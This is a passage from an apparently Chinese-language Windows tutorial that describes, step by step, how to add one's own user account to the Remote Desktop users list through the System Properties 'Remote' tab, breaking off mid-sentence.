直接为自己的用户帐号赋予远程桌面连接权限 先用鼠 标右键单击 我的电脑 图标 从其后的快捷菜单中执行 属性 命令 打开目标服务器系统属性 设置窗口 单击该设置窗口中的 远程 标签 在对应的标签设置页面中 单击 选择远程用户 按钮 打开如图 3 所示的设置对话框 图 3 检查该对话框中是否包含自己的用户帐号名称 要是没有看到的话 我们可以直接单击这里的 添加 按钮 从其后出现的选择用户帐号列表中 选中自己的用户帐号 再单击 确定 按钮 这样一来